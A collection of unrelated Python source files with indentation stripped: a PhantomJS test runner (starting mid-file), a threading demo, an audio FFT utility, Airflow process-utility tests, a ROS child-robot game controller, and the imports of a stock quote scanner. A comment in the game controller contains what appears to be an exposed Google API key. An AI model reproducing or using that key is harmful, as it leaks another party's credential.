grp.report_for_verbose_level(sys.stdout, self.verbose)
results.append(grp)
sys.stdout.write("\n")
return self.report(results, time.time() - start)
def report(self, results, elapsed):
# There is always one test group, for the HTTP server errors.
if len(results) == 1:
sys.stderr.write("No tests selected for execution.\n")
return 1
n = [0] * T.MAX
for grp in results:
if self.verbose == 0 and not grp.is_successful():
grp.report(sys.stdout, False)
for i, x in enumerate(grp.n): n[i] += x
sys.stdout.write("{:6.3f}s elapsed\n".format(elapsed))
for s in (T.PASS, T.FAIL, T.XPASS, T.XFAIL, T.ERROR, T.SKIP, T.UNSUPPORTED):
if n[s]:
sys.stdout.write(" {:>4} {}\n".format(n[s], s.long_label))
if n[T.FAIL] == 0 and n[T.XPASS] == 0 and n[T.ERROR] == 0:
return 0
else:
return 1
def init():
base_path = os.path.normpath(os.path.dirname(os.path.abspath(__file__)))
phantomjs_exe = os.path.normpath(base_path + '/../../../phantom_shim/runner.js')
if not os.path.isfile(phantomjs_exe):
sys.stdout.write("{} is unavailable, cannot run tests.\n"
.format(phantomjs_exe))
sys.exit(1)
parser = argparse.ArgumentParser(description='Run PhantomJS tests.')
parser.add_argument('-v', '--verbose', action='count', default=0,
help='Increase verbosity of logs (repeat for more)')
parser.add_argument('to_run', nargs='*', metavar='test',
help='tests to run (default: all of them)')
parser.add_argument('--debugger', default=None,
help="Run PhantomJS under DEBUGGER")
parser.add_argument('--run-unsupported', action='count', default=0,
help='Run unsupported tests.')
parser.add_argument('--color', metavar="WHEN", default='auto',
choices=['always', 'never', 'auto'],
help="colorize the output; can be 'always',"
" 'never', or 'auto' (the default)")
options = parser.parse_args()
activate_colorization(options)
runner = TestRunner(base_path, phantomjs_exe, options)
if options.verbose:
rc, ver, err = runner.run_phantomjs('--version', silent=True)
if rc != 0 or len(ver) != 1 or len(err) != 0:
sys.stdout.write(colorize("R", "FATAL")+": Version check failed\n")
for l in ver:
sys.stdout.write(colorize("b", "## " + l) + "\n")
for l in err:
sys.stdout.write(colorize("b", "## " + l) + "\n")
sys.stdout.write(colorize("b", "## exit {}".format(rc)) + "\n")
sys.exit(1)
sys.stdout.write(colorize("b", "## Testing PhantomJS "+ver[0])+"\n")
# Run all the tests in Chatham Islands Standard Time, UTC+12:45.
# This timezone is deliberately chosen to be unusual: it's not a
# whole number of hours offset from UTC *and* it's more than twelve
# hours offset from UTC.
#
# The Chatham Islands do observe daylight savings, but we don't
# implement that because testsuite issues only reproducible on two
# particular days out of the year are too much tsuris.
#
# Note that the offset in a TZ value is the negative of the way it's
# usually written, e.g. UTC+1 would be xxx-1:00.
os.environ["TZ"] = "CIST-12:45:00"
return runner
def main():
runner = init()
try:
with HTTPTestServer(runner.base_path,
runner.signal_server_error,
runner.verbose):
sys.exit(runner.run_tests())
except Exception:
trace = traceback.format_exc(5).split("\n")
# there will be a blank line at the end of 'trace'
sys.stdout.write(colorize("R", "FATAL") + ": " + trace[-2] + "\n")
for line in trace[:-2]:
sys.stdout.write(colorize("b", "## " + line) + "\n")
sys.exit(1)
except KeyboardInterrupt:
sys.exit(2)
main()
|
threads_share_varables.py | import threading
import time
from random import randint
url_list=[]
def get_url_list():
global url_list
# 爬取文章列表页的url:生产者
print("get_url_list begining")
while True:
for i in range(10):
url_list.append("www.studyai.com/"+str(randint(1,2000))+"/")
time.sleep(2)
print("生产者又生产了10个url")
def get_html_detail(id):
global url_list
# 爬取url列表中的文章的详情页:消费者
print("get_html_detail begining")
while True:
print("剩余url个数:", len(url_list))
if len(url_list)>0:
# for url in url_list:
url = url_list.pop()
print("#"+str(id)+" 正在爬取详情页:"+url)
time.sleep(1)
else:
print("url 列表为空啦~~")
# break
if __name__ == "__main__":
start_time = time.time()
list_thread = threading.Thread(target=get_url_list)
list_thread.start()
# list_thread.join()
detail_threads=[]
for k in range(5):
detail_thread = threading.Thread(target=get_html_detail,args=(k,))
detail_threads.append(detail_thread)
detail_thread.start()
# detail_thread.join()
consumed_time = time.time() - start_time
print("time consumed: ", consumed_time)
|
audio_utils.py | # This file is a highlly modifed version of the file SWHear.py
# from https://github.com/swharden/Python-GUI-examples
# http://www.SWHarden.com
# The License for this file is MIT License, for the original and for all my modifications.
# This was only used to make a profile of the object used in memory.
# import memory_profiler
# Optimization of the code, compilling it in JIT with NUMBA (only works with the Anaconda distribution).
# But right now it's not being used because it's not nedded.
#from numba import jit
# We have to put the tag @jit in the line before the function that we whan't to optimize, only works with functions.
# @jit
import pyaudio
import time
import numpy as np
import threading
# import harmonica_notes_and_holes
from harmonica_notes_and_holes import get_external_list_holes, get_external_orde_notes_name_list, get_external_orde_notes_freq_list
# Global variable that is defined in the main source file.
# list_holes = harmonica_notes_and_holes.get_external_list_holes()
list_holes = get_external_list_holes()
# We are going to join 4 buffer de 2205 and only then we calculate the FFT, in the hope that by making the
# input buffer longer (more samples) we can have a FFT with more points and make a smaller bucket size,
# int he hope that the lower differences in frequencies of the lower notes can be weel separated between Blow
# and Draw. And not miss-mached. We are going to have 4 buckets for each bucket.
flag_FFT_buffer_part_num = 0
len_FFT = 0
def get_len_FFT():
global len_FFT
return len_FFT
#@jit
def realtime_processa_buffers_de_rolling_FFT( self, flag_FFT_buffer_part_num ):
if flag_FFT_buffer_part_num == 0:
#print("data_buffer_0")
# Free the memory of the previous buffer, I think that NumPy has optimizations for detecting this instruction,
# not sure.
self.data_buffer_0 = None
# Fill's the first part of the buffer (buffer_1).
self.data_buffer_0 = np.fromstring(self.stream.read(self.chunk), dtype=np.int16)
flag_FFT_buffer_part_num += 1
# We have to initialize the buffers in the first time, while the program is running the buffer has
# always the some size and call the FFT with the same number of points.
if self.data_buffer_1 is None:
len_buffer_0 = len(self.data_buffer_0)
self.data_buffer_1 = np.zeros(len_buffer_0, dtype=np.int16)
self.data_buffer_2 = np.zeros(len_buffer_0, dtype=np.int16)
self.data_buffer_3 = np.zeros(len_buffer_0, dtype=np.int16)
self.data = np.concatenate([self.data_buffer_1,
self.data_buffer_2,
self.data_buffer_3,
self.data_buffer_0])
elif flag_FFT_buffer_part_num == 1:
#print("data_buffer_1")
# Free's the memory of the previous buffer.
self.data_buffer_1 = None
self.data_buffer_1 = np.fromstring(self.stream.read(self.chunk), dtype=np.int16)
flag_FFT_buffer_part_num += 1
self.data = np.concatenate([self.data_buffer_2,
self.data_buffer_3,
self.data_buffer_0,
self.data_buffer_1])
elif flag_FFT_buffer_part_num == 2:
#print("data_buffer_2")
# Free's the memory of the previous buffer.
self.data_buffer_2 = None
self.data_buffer_2 = np.fromstring(self.stream.read(self.chunk), dtype=np.int16)
flag_FFT_buffer_part_num += 1
self.data = np.concatenate([self.data_buffer_3,
self.data_buffer_0,
self.data_buffer_1,
self.data_buffer_2])
elif flag_FFT_buffer_part_num == 3:
#print("data_buffer_3")
# Free's the memory of the previous buffer.
self.data_buffer_3 = None
self.data_buffer_3 = np.fromstring(self.stream.read(self.chunk), dtype=np.int16)
flag_FFT_buffer_part_num = 0
# Joins the 4 buffers in one buffer (ex: thee 2205 sample join to become 4405--> 8810 values---> 13230 values),
# Isn't a power of two but is the best we can do.
# Don't forget that the power of Two FFT's are have a faster execution, because of the buterfly algorithm.
self.data = np.concatenate([self.data_buffer_0,
self.data_buffer_1,
self.data_buffer_2,
self.data_buffer_3])
# Delete the buffers tnat are not used..
# del self.data_buffer_0
# del self.data_buffer_1
# del self.data_buffer_2
# del self.data_buffer_3
# self.data_buffer_0 = None
# self.data_buffer_1 = None
# self.data_buffer_2 = None
# self.data_buffer_3 = None
return flag_FFT_buffer_part_num
#@jit
def getFFT(data, rate):
# returns FFTfreq and FFT, half.
# print("len(data): " + str(len(data)) + " --- " + " rate: " + str(rate) )
len_data = len(data)
data = data * np.hamming(len_data)
fft = np.fft.rfft(data)
fft = np.abs(fft)
ret_len_FFT = len(fft)
freq = np.fft.rfftfreq(len_data, 1.0 / rate)
return ( freq[:int(len(freq) / 2)], fft[:int(ret_len_FFT / 2)], ret_len_FFT )
class AudioUtils():
"""
Read the data from microphone.
Arguments:
device: Blanck to detect automatically the sound card device,
or give a number to specify a specific sound card.
rate - The sample rate, but it defaults do the value for the device.
updatesPerSecond - the number of buffers obtained from the device per second.
"""
def __init__(self,device=None,rate=None,updatesPerSecond=10):
self.p=pyaudio.PyAudio()
self.chunk=4096 # This value can change by the device, in my case is 2205 samples.
self.updatesPerSecond=updatesPerSecond
self.chunksRead=0
self.device=device
self.rate=rate
### SYSTEM TESTS
def valid_low_rate(self,device):
"""set the rate to the lowest supported audio rate."""
for testrate in [44100]:
if self.valid_test(device,testrate):
return testrate
print("...something is wrong, can't use the device, maybe you have more devices that device 0 (zero)",device)
return None
def valid_test(self,device,rate=44100):
"""given a device ID and a rate, return TRUE/False if it's valid."""
try:
self.info=self.p.get_device_info_by_index(device)
if not self.info["maxInputChannels"]>0:
return False
stream=self.p.open(format=pyaudio.paInt16,channels=1,
input_device_index=device,frames_per_buffer=self.chunk,
rate=int(self.info["defaultSampleRate"]),input=True)
stream.close()
return True
except:
return False
def valid_input_devices(self):
"""
See which devices can be opened for microphone input.
call this when no PyAudio object is loaded.
"""
mics=[]
for device in range(self.p.get_device_count()):
if self.valid_test(device):
mics.append(device)
if len(mics)==0:
print("no microphone devices found!")
else:
print("found %d microphone devices: %s"%(len(mics),mics))
return mics
### SETUP AND SHUTDOWN
def initiate(self):
"""run this after changing settings (like rate) before recording"""
if self.device is None:
self.device=self.valid_input_devices()[0] # pick the first one
if self.rate is None:
self.rate=self.valid_low_rate(self.device)
self.chunk = int(self.rate/self.updatesPerSecond) # hold one tenth of a second in memory
if not self.valid_test(self.device,self.rate):
print("guessing a valid microphone device/rate...")
self.device=self.valid_input_devices()[0] #pick the first one
self.rate=self.valid_low_rate(self.device)
self.datax=np.arange(self.chunk)/float(self.rate)
msg='recording from "%s" '%self.info["name"]
msg+='(device %d) '%self.device
msg+='at %d Hz'%self.rate
print(msg)
def close(self):
"""gently detach from things."""
print(" - sending stream termination command...")
self.keepRecording=False #the threads should self-close
while(self.t.isAlive()): #wait for all threads to close
time.sleep(.1)
self.stream.stop_stream()
self.p.terminate()
### STREAM HANDLING
def stream_readchunk(self):
"""reads some audio and re-launches itself"""
global flag_FFT_buffer_part_num
##############
# Rolling buffer.....
#####
data_buffer_initial = np.fromstring(self.stream.read(self.chunk), dtype=np.int16)
len_buffer = len(data_buffer_initial)
step = len_buffer
len_buffer_rolling = len_buffer * 4
#len_buffer_rolling = len_buffer * 8
#len_buffer_rolling = len_buffer * 32
# Inicializes the rolling buffer.
self.data = np.zeros(len_buffer_rolling, 'f')
try:
# # DDEBUG
# usage = memory_profiler.memory_usage()
# print("Begin: " + str(usage))
# # # DDEBUG
# # usage = memory_profiler.memory_usage()
# # print("End: " + str(usage))
while(self.keepRecording == True):
#flag_FFT_buffer_part_num = realtime_processa_buffers_de_rolling_FFT(self, flag_FFT_buffer_part_num)
#print("self.rate: " + str(self.rate))
######################################
######################################
###########
# Rolling buffer.....
#####
# Rolles the rolling buffer.
self.data = np.roll(self.data, -step)
self.data[-step:] = np.fromstring(self.stream.read(self.chunk), dtype=np.int16)
######################################
######################################
# The sample buffer data that comes from the sound card is always copied, but the FFT
# only calculates half the number of times the buffer is copied. Altough it contains
# all the data.
# Note: Currently it calculates all the times because we are using a rolling buffer
# it has a higher performance. And I think that we can even use a deeper rolling
# buffer and a FFT with more data points. That would give us more precision in
# the graph that we show for the bending of notes.
#
if (flag_FFT_buffer_part_num == 0 or
flag_FFT_buffer_part_num == 2):
# Calc FFT.
self.fftx, self.fft, ret_lenFFT = getFFT(self.data, self.rate)
global len_FFT
len_FFT = ret_lenFFT
self.chunksRead+=1
time.sleep(0.0001)
except Exception as E:
print(" - an exception ocorred!")
self.keepRecording=False
self.stream.close()
self.p.terminate()
print(" - stream STOPPED")
self.chunksRead+=1
def stream_thread_new(self):
self.t=threading.Thread(target=self.stream_readchunk)
self.t.start()
def stream_start(self):
"""adds data to self.data until termination signal"""
self.initiate()
print(" - starting audio stream")
self.keepRecording=True # set this to False later to terminate stream
self.data=None # will fill up with threaded recording data
self.fft=None
self.data_buffer_0 = None
self.data_buffer_1 = None
self.data_buffer_2 = None
self.data_buffer_3 = None
self.stream=self.p.open(format=pyaudio.paInt16,channels=1,
rate=self.rate,input=True,frames_per_buffer=self.chunk)
self.stream_thread_new()
# if __name__== "__main__":
# mic=AudioUtils(updatesPerSecond=10)
# mic.stream_start() # Starts a new loop inside a new thread.
# lastRead=mic.chunksRead
# while True:
# while lastRead==mic.chunksRead:
# time.sleep(.01)
# print(mic.chunksRead,len(mic.data))
# lastRead=mic.chunksRead
|
test_process_utils.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import subprocess
import time
import unittest
from contextlib import suppress
from subprocess import CalledProcessError
from tempfile import NamedTemporaryFile
from time import sleep
from unittest import mock
import psutil
import pytest
from airflow.exceptions import AirflowException
from airflow.utils import process_utils
from airflow.utils.process_utils import check_if_pidfile_process_is_running, execute_in_subprocess, log
class TestReapProcessGroup(unittest.TestCase):
@staticmethod
def _ignores_sigterm(child_pid, child_setup_done):
def signal_handler(unused_signum, unused_frame):
pass
signal.signal(signal.SIGTERM, signal_handler)
child_pid.value = os.getpid()
child_setup_done.release()
while True:
time.sleep(1)
@staticmethod
def _parent_of_ignores_sigterm(parent_pid, child_pid, setup_done):
def signal_handler(unused_signum, unused_frame):
pass
os.setsid()
signal.signal(signal.SIGTERM, signal_handler)
child_setup_done = multiprocessing.Semaphore(0)
child = multiprocessing.Process(
target=TestReapProcessGroup._ignores_sigterm, args=[child_pid, child_setup_done]
)
child.start()
child_setup_done.acquire(timeout=5.0)
parent_pid.value = os.getpid()
setup_done.release()
while True:
time.sleep(1)
def test_reap_process_group(self):
"""
Spin up a process that can't be killed by SIGTERM and make sure
it gets killed anyway.
"""
parent_setup_done = multiprocessing.Semaphore(0)
parent_pid = multiprocessing.Value('i', 0)
child_pid = multiprocessing.Value('i', 0)
args = [parent_pid, child_pid, parent_setup_done]
parent = multiprocessing.Process(target=TestReapProcessGroup._parent_of_ignores_sigterm, args=args)
try:
parent.start()
assert parent_setup_done.acquire(timeout=5.0)
assert psutil.pid_exists(parent_pid.value)
assert psutil.pid_exists(child_pid.value)
process_utils.reap_process_group(parent_pid.value, logging.getLogger(), timeout=1)
assert not psutil.pid_exists(parent_pid.value)
assert not psutil.pid_exists(child_pid.value)
finally:
try:
os.kill(parent_pid.value, signal.SIGKILL) # terminate doesn't work here
os.kill(child_pid.value, signal.SIGKILL) # terminate doesn't work here
except OSError:
pass
class TestExecuteInSubProcess(unittest.TestCase):
def test_should_print_all_messages1(self):
with self.assertLogs(log) as logs:
execute_in_subprocess(["bash", "-c", "echo CAT; echo KITTY;"])
msgs = [record.getMessage() for record in logs.records]
assert ["Executing cmd: bash -c 'echo CAT; echo KITTY;'", 'Output:', 'CAT', 'KITTY'] == msgs
def test_should_raise_exception(self):
with pytest.raises(CalledProcessError):
process_utils.execute_in_subprocess(["bash", "-c", "exit 1"])
def my_sleep_subprocess():
sleep(100)
def my_sleep_subprocess_with_signals():
signal.signal(signal.SIGINT, lambda signum, frame: None)
signal.signal(signal.SIGTERM, lambda signum, frame: None)
sleep(100)
class TestKillChildProcessesByPids(unittest.TestCase):
def test_should_kill_process(self):
before_num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
process = multiprocessing.Process(target=my_sleep_subprocess, args=())
process.start()
sleep(0)
num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
assert before_num_process + 1 == num_process
process_utils.kill_child_processes_by_pids([process.pid])
num_process = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().count("\n")
assert before_num_process == num_process
def test_should_force_kill_process(self):
process = multiprocessing.Process(target=my_sleep_subprocess_with_signals, args=())
process.start()
sleep(0)
all_processes = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().splitlines()
assert str(process.pid) in map(lambda x: x.strip(), all_processes)
with self.assertLogs(process_utils.log) as cm:
process_utils.kill_child_processes_by_pids([process.pid], timeout=0)
assert any("Killing child PID" in line for line in cm.output)
sleep(0)
all_processes = subprocess.check_output(["ps", "-ax", "-o", "pid="]).decode().splitlines()
assert str(process.pid) not in map(lambda x: x.strip(), all_processes)
class TestPatchEnviron(unittest.TestCase):
def test_should_update_variable_and_restore_state_when_exit(self):
with mock.patch.dict("os.environ", {"TEST_NOT_EXISTS": "BEFORE", "TEST_EXISTS": "BEFORE"}):
del os.environ["TEST_NOT_EXISTS"]
assert "BEFORE" == os.environ["TEST_EXISTS"]
assert "TEST_NOT_EXISTS" not in os.environ
with process_utils.patch_environ({"TEST_NOT_EXISTS": "AFTER", "TEST_EXISTS": "AFTER"}):
assert "AFTER" == os.environ["TEST_NOT_EXISTS"]
assert "AFTER" == os.environ["TEST_EXISTS"]
assert "BEFORE" == os.environ["TEST_EXISTS"]
assert "TEST_NOT_EXISTS" not in os.environ
def test_should_restore_state_when_exception(self):
with mock.patch.dict("os.environ", {"TEST_NOT_EXISTS": "BEFORE", "TEST_EXISTS": "BEFORE"}):
del os.environ["TEST_NOT_EXISTS"]
assert "BEFORE" == os.environ["TEST_EXISTS"]
assert "TEST_NOT_EXISTS" not in os.environ
with suppress(AirflowException):
with process_utils.patch_environ({"TEST_NOT_EXISTS": "AFTER", "TEST_EXISTS": "AFTER"}):
assert "AFTER" == os.environ["TEST_NOT_EXISTS"]
assert "AFTER" == os.environ["TEST_EXISTS"]
raise AirflowException("Unknown exception")
assert "BEFORE" == os.environ["TEST_EXISTS"]
assert "TEST_NOT_EXISTS" not in os.environ
class TestCheckIfPidfileProcessIsRunning(unittest.TestCase):
def test_ok_if_no_file(self):
check_if_pidfile_process_is_running('some/pid/file', process_name="test")
def test_remove_if_no_process(self):
# Assert file is deleted
with pytest.raises(FileNotFoundError):
with NamedTemporaryFile('+w') as f:
f.write('19191919191919191991')
f.flush()
check_if_pidfile_process_is_running(f.name, process_name="test")
def test_raise_error_if_process_is_running(self):
pid = os.getpid()
with NamedTemporaryFile('+w') as f:
f.write(str(pid))
f.flush()
with pytest.raises(AirflowException, match="is already running under PID"):
check_if_pidfile_process_is_running(f.name, process_name="test")
|
iSpyGameFSM.py |
"""
This is a basic class for the Game Controller
"""
import json
import time
from GameUtils.AudioRecorder import AudioRecorder
from .iSpyTaskController import iSpyTaskController
import rospy
import _thread as thread
# -*- coding: utf-8 -*-
# pylint: disable=import-error
from transitions import Machine
import threading
# from GameUtils import Curriculum
from GameUtils import GlobalSettings
from GameUtils.GlobalSettings import iSpyGameStates as gs
from GameUtils.GlobalSettings import iSpyRobotInteractionStates as ris
from GameUtils.PronunciationUtils.PronunciationUtils import PronunciationUtils
from .ROSNodeMgr import ROSNodeMgr
from .iSpyDataTracking import iSpyDataTracking
#from .StudentModel import StudentModel
from .RobotBehaviorList.RobotBehaviorList import RobotBehaviors
from .RobotBehaviorList.RobotBehaviorList import RobotRoles
from .RobotBehaviorList.RobotBehaviorList import RobotRolesBehaviorsMap
from .AffdexAnalysis.node_AffdexResponse import AffdexAnalysis
from .RoleSwitchingPrj.ChildRobotInteractionFSM import ChildRobotInteractionFSM
from .GameModeFSMs import AlwaysMissionModeFSM,CompleteModeFSM,AlwaysExploreModeFSM
from multiprocessing import Process
import datetime
# from StudentModel import StudentModel
if GlobalSettings.USE_ROS:
from std_msgs.msg import Header # standard ROS msg header
from std_msgs.msg import String
from unity_game_msgs.msg import iSpyCommand
from unity_game_msgs.msg import iSpyAction
else:
pass
# TapGameLog = GlobalSettings.TapGameLog #Mock ob-ject, used for testing in non-ROS environments
# TapGameCommand = GlobalSettings.TapGameCommand
#Recording Time Constant
RECORD_TIME_MS = 3500
# COMMAND CONSTANTS
RESET = 0
SHOW_PRONOUNCIATION_PANEL = 1
SHOW_OBJECT_DESCR_PANEL = 2
ROBOT_EXPERT_ROLE = 3
SEND_PRONOUNCIATION_ACCURACY_TO_UNITY = 10
SEND_TASKS_TO_UNITY = 20
GAME_FINISHED = 99
BUTTON_DISABLED=31
TASK_COMPLETED = 32
VALID_ISPY_COMMANDS = [RESET, SHOW_PRONOUNCIATION_PANEL, SHOW_PRONOUNCIATION_PANEL, SEND_PRONOUNCIATION_ACCURACY_TO_UNITY, SEND_TASKS_TO_UNITY, GAME_FINISHED,BUTTON_DISABLED]
SET_GAME_SCENE = 34
class iSpyGameFSM: # pylint: disable=no-member
"""
Receives and sends out ROS messages.
"""
def __init__(self,participant_id, experimenter, session_number):
self.ros_node_mgr = ROSNodeMgr()
self.ros_node_mgr.init_ros_node()
self.session_number = session_number
# Keeps track of the word the child is supposed to say
self.origText = ""
# check whether the clicked object is a target object
self.correct_obj = False
# The object of the iSpyAudioRecorder Class
self.recorder = None
# Publisher to the ROS_TO_ISPY_GAME_TOPIC
self.game_commander = None
# Bool telling if the cmd message was heard from Unity
self.ros_node_mgr.message_received = False
self.task_controller = iSpyTaskController(session_number)
self.results_handler = PronunciationUtils()
self.interaction = ChildRobotInteractionFSM(self.ros_node_mgr,self.task_controller,self, participant_id,session_number)
self.iSpyDataTracking = iSpyDataTracking(self.interaction,self.ros_node_mgr, participant_id, experimenter, session_number)
# Bool stating whether or not the current mission is completed
self.mission_completed = True
# choose which game FSM to call
# AlwaysMissionModeFSM(self.ros_node_mgr) # CompleteModeFSM() # AlwaysExploreModeFSM(self.ros_node_mgr)
self.FSM = AlwaysMissionModeFSM(self.ros_node_mgr,session_number)
if session_number != "practice":
self.affdexAnalysis = AffdexAnalysis(self,self.ros_node_mgr,participant_id,experimenter, session_number)
self.kill_received = False # for stopping the update() thread
self.current_task_index = 0
# start a thread to check the game update
#self.t = threading.Thread(target=self.update)
#self.t.start()
def update(self):
while self.kill_received == False:
if self.FSM.state != gs.MISSION_MODE:
self.iSpyDataTracking.stop_tracking_child_interaction()
if self.interaction.state != ris.CHILD_TURN and self.interaction.state != ris.ROBOT_TURN+'_'+ris.CHILD_HELP:
self.iSpyDataTracking.stop_tracking_child_interaction()
if self.kill_received == True:
break
def _reach_max_task_time(self): # if the condition is in "fixed novice": set a max elapsed time
if self.interaction.subj_cond != "novice": return
max_elapsed_time = datetime.timedelta(seconds=4.5*60) # 5 mins
max_elapsed_time2 = datetime.timedelta(seconds=6.5*60) # 5 mins
if datetime.datetime.now() - self.task_controller.get_task_time()['start'] > max_elapsed_time:
if self.task_controller.num_finished_words <= 2: self.task_controller.reset_for_new_task()
if datetime.datetime.now() - self.task_controller.get_task_time()['start'] > max_elapsed_time2:
if self.task_controller.num_finished_words <= 3: self.task_controller.reset_for_new_task()
def on_ispy_state_info_received(self,transition_msg):
"""
Rospy Callback for when we get log messages from ispy game
"""
def check_task_completion():
if not self.task_controller.task_in_progress:
# let the game knows the task is completed
self.ros_node_mgr.send_ispy_cmd(TASK_COMPLETED)
self.current_task_index += 1
if self.current_task_index != 0:
action_number = self.current_task_index
self.interaction.start_task_end_behavior(action_number)
#print("State Transition: "+transition_msg.data)
if transition_msg.data in gs.Triggers.triggers:
#time.sleep(.1)
if self.FSM.state != gs.EXPLORATION_MODE and self.FSM.state != gs.WORD_DISPLAY: # if the game is still in explore mode
self.interaction.react(transition_msg.data,self.origText) # the robot reacts
if transition_msg.data == gs.Triggers.TOPLEFT_BUTTON_PRESSED:
self.iSpyDataTracking.start_stopwatch()
self.interaction.turn_start_time = datetime.datetime.now()
self._run_game_task()
elif transition_msg.data == gs.Triggers.CONNECT_BUTTON_PRESSED:
self.ros_node_mgr.send_ispy_cmd(34, self.session_number) #SET_GAME_SCNE = 34
print("CONNECT_BUTTON_PRESSED : "+self.session_number)
self.ros_node_mgr.send_robot_cmd(RobotBehaviors.ROBOT_HAPPY_DANCE)
elif transition_msg.data == gs.Triggers.HINT_BUTTON_PRESSED:
self.interaction.numHintButtonPressedForTask += 1
elif transition_msg.data == gs.Triggers.OBJECT_CLICKED:
pass
elif transition_msg.data == gs.Triggers.NONTARGET_OBJECT_COLLECTED or transition_msg.data == gs.Triggers.TARGET_OBJECT_COLLECTED:
self._reach_max_task_time()
check_task_completion()
self.interaction.turn_taking()
# elif transition_msg.data == gs.Triggers.TARGET_OBJECT_COLLECTED:
# self._reach_max_task_time()
# check_task_completion()
# self.interaction.turn_taking()
elif transition_msg.data == gs.Triggers.PRONUNCIATION_PANEL_CLOSED:
if self.interaction.state == ris.CHILD_TURN: # when a new turn is child's, then start tracking the child's interaction
t = threading.Timer(3.0, self.interaction.start_tracking_child_interaction).start() # checking for timeout
elif transition_msg.data == gs.Triggers.SCREEN_MOVED:
self.interaction.stop_tracking_child_interaction()
# If the message is in gs.Triggers, then allow the trigger
if transition_msg.data != gs.Triggers.SCREEN_MOVED:
self.FSM.start_trigger(transition_msg.data)
#################################################################################################
def on_ispy_log_received(self, log_msg):
# If the the message was "messageReceived", that means that the publishing loop can stop
if log_msg.data == "messageReceived":
self.ros_node_mgr.message_received = True
#################################################################################################
def on_ispy_action_received(self, ispy_action_msg):
"""
Rospy callback for when we get ispy action from the unity game over ROS
"""
if self.FSM.state == gs.EXPLORATION_MODE or self.FSM.state == gs.WORD_DISPLAY:
# if the game is still in explore mode
return
time.sleep(0.1) # wait for on_ispy_state_info_received() to finish and FSM to transition first
#self.interaction.stop_tracking_child_interaction() # start tracking the elapsed time of child's lack of tablet interaction
self.iSpyDataTracking.on_ispy_action_received(ispy_action_msg)
def speakingStage(stage):
if stage == "speakingStart":
self.recorder.has_recorded += 1
# self.recorder.start_recording(self.origText, RECORD_TIME_MS, self.interaction.state)
# #TODO: Update 'test' to actual word
elif stage == "speakingEnd":
self.recorder.has_recorded += 1
# self.recorder.stop_recording()
def msg_evaluator(ispy_action_msg):
"""Calls the respective functions for each part of the action msg
"""
#Removes object position from ispy_action_msg
if ispy_action_msg.clickedObjectName != "":
object_name = ""
for letter in ispy_action_msg.clickedObjectName:
if letter == "-":
break
object_name += letter
self.origText = object_name
#Initializes a new audio recorder object if one hasn't been created
if self.recorder == None: self.recorder = AudioRecorder()
speakingStage(ispy_action_msg.speakingStage)
print("\n")
# Evaluates the action message
msg_evaluator(ispy_action_msg)
self._speechace_analysis()
if self.interaction.state == ris.CHILD_TURN or self.interaction.state == ris.ROBOT_TURN+'_'+ris.CHILD_HELP:
pass
# if self.FSM.state == gs.MISSION_MODE:
# threading.Timer(0.5, self.interaction.start_tracking_child_interaction).start() # start tracking the elapsed time of child's lack of tablet interaction
self.isDragging = ispy_action_msg.isDragging
self.pointerClick = ispy_action_msg.pointerClick
self.onPinch = ispy_action_msg.onPinch
self.isScalingUp = ispy_action_msg.isScalingUp
self.isScalingDown = ispy_action_msg.isScalingDown
self.interaction._ros_publish_data("","", True)
def _speechace_analysis(self):
'''
speech ace analysis
'''
print("+++++speech analay: {}".format(self.origText))
# If given a word to evaluate and done recording send the information to speechace
if self.origText and self.recorder.has_recorded % 2 == 0 and self.recorder.has_recorded != 0:
# If you couldn't find the android audio topic, automatically pass
# instead of using the last audio recording
print("clicked object is: "+self.origText)
self.correct_obj = self.task_controller.isTarget(self.origText)
letters = list(self.origText)
passed = ['1'] * len(letters)
print("NO RECORDING SO YOU AUTOMATICALLY PASS")
# TODO: Delete if we are not planning on using SpeechAce as real-time source of game info
# if not self.recorder.valid_recording:
# letters = list(self.origText)
# passed = ['1'] * len(letters)
# print ("NO RECORDING SO YOU AUTOMATICALLY PASS")
# else:AIzaSyDK8tFh08NPXRotdeOmSuTd8hzczxms7nY
# audioFile = self.recorder.WAV_OUTPUT_FILENAME_PREFIX + self.origText + '.wav'
# word_score_list = self.recorder.speechace(audioFile)
#
# if word_score_list:
# for word in word_score_list:
# letters, passed = self.results_handler.process_speechace_word_results(word)
#
# else:
# letters = list(self.origText)
# passed = ['1'] * len(letters)
# print ("NO, RECORDING SO YOU AUTOMATICALLY PASS")
results_params = {}
results_params["letters"] = letters
results_params["passed"] = passed
# Checks each letter and if one letter is False then the word is not perfectly said
perfect_word = True
for i in passed:
if i == '0':
perfect_word = False
break
# If the word was pronounced perfectly then reset origText
if perfect_word:
if self.task_controller.isTarget(self.origText):
self.task_controller.update_target_list(self.origText)
self.origText = ""
#print(results_params)
self.ros_node_mgr.send_ispy_cmd(SEND_PRONOUNCIATION_ACCURACY_TO_UNITY, results_params)
self.recorder.has_recorded = 0
def _run_game_task(self):
# When entering mission mode from exploration mode, get a random task
# and send it to Unity
if self.task_controller.task_in_progress == False:
task = self.task_controller.get_next_task()
# If there are no more available quests, you won the game
if task == None:
self.ros_node_mgr.send_ispy_cmd(GAME_FINISHED)
self.interaction.child_states.done()
else:
self.ros_node_mgr.send_ispy_cmd(SEND_TASKS_TO_UNITY, task)
self.interaction.reset_turn_taking()
self.interaction.get_robot_general_response()
t = threading.Timer(3.0,self.interaction.start_tracking_child_interaction).start()
threading.Timer(10.0, self.interaction.on_child_max_elapsed_time).start()
|
quoteScanner.py | # -*- coding: utf-8 -*-
import threading, time
import click
import pandas as pd
from nseta.live.live import get_quote, get_live_quote, get_data_list
from nseta.scanner.baseScanner import baseScanner
from nseta.common.tradingtime import IST_datetime
from nseta.resources.resources import resources
from nseta.archives.archiver import *
from nseta.common.log import tracelog, default_logger
from nseta.common.commons import human_readable_df
